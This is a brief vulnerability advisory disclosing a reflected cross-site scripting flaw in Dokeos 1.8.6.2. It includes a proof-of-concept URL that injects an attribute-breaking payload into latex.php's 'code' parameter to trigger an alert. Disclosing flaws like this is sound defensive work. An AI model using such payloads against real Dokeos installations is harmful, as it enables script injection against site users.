Home
Consulting
Advisories
Software
Articles
Contact

Dokeos 1.8.6.2 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in Dokeos 1.8.6.2 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/dokeos/main/inc/latex.php?code=%22style=%22top:0;position:absolute;width:9999px;height:9999px;%22onmouseover%3d%22alert(0)


Copyright © 2018 AutoSec Tools LLC